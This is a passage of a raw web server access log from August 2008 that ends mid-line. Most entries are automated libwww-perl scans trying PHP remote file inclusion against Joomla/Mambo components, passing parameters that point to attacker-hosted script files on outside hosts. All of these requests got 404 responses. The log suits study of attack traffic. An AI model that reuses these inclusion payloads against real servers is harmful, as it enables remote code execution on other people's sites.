207.200.116.202 - - [01/Aug/2008:23:38:12 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
62.50.65.51 - - [01/Aug/2008:23:38:19 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
62.50.65.51 - - [01/Aug/2008:23:38:19 -0500] "GET /phphtml.php?htmlclass_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
207.200.116.202 - - [01/Aug/2008:23:38:30 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
62.50.65.51 - - [01/Aug/2008:23:38:30 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
62.50.65.51 - - [01/Aug/2008:23:38:31 -0500] "GET /phphtml.php?htmlclass_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
83.223.15.168 - - [01/Aug/2008:23:40:00 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
83.223.15.168 - - [01/Aug/2008:23:40:00 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
77.221.130.16 - - [01/Aug/2008:23:40:20 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
77.221.130.16 - - [01/Aug/2008:23:40:21 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
125.24.86.179 - - [01/Aug/2008:23:40:58 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:40:59 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
74.6.18.231 - - [01/Aug/2008:23:43:51 -0500] "GET /logs/access_log.1199059200 HTTP/1.0" 200 111852 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.24.32 - - [01/Aug/2008:23:44:28 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/test.txt?? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
125.24.86.179 - - [01/Aug/2008:23:45:12 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:45:16 -0500] "GET /phphtml.php?htmlclass_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
85.239.113.1 - - [01/Aug/2008:23:45:55 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
85.239.113.1 - - [01/Aug/2008:23:45:55 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
85.239.113.1 - - [01/Aug/2008:23:45:55 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
85.239.113.1 - - [01/Aug/2008:23:45:55 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
81.169.186.162 - - [01/Aug/2008:23:46:25 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
81.169.186.162 - - [01/Aug/2008:23:46:26 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
125.24.86.179 - - [01/Aug/2008:23:46:43 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:46:44 -0500] "GET /phphtml.php?htmlclass_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:47:03 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:47:03 -0500] "GET /phphtml.php?htmlclass_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
208.75.225.10 - - [01/Aug/2008:23:49:41 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
208.75.225.10 - - [01/Aug/2008:23:49:41 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
81.169.186.162 - - [01/Aug/2008:23:50:32 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
85.239.113.1 - - [01/Aug/2008:23:50:46 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
81.169.186.162 - - [01/Aug/2008:23:51:07 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://art00.com/board/id.tx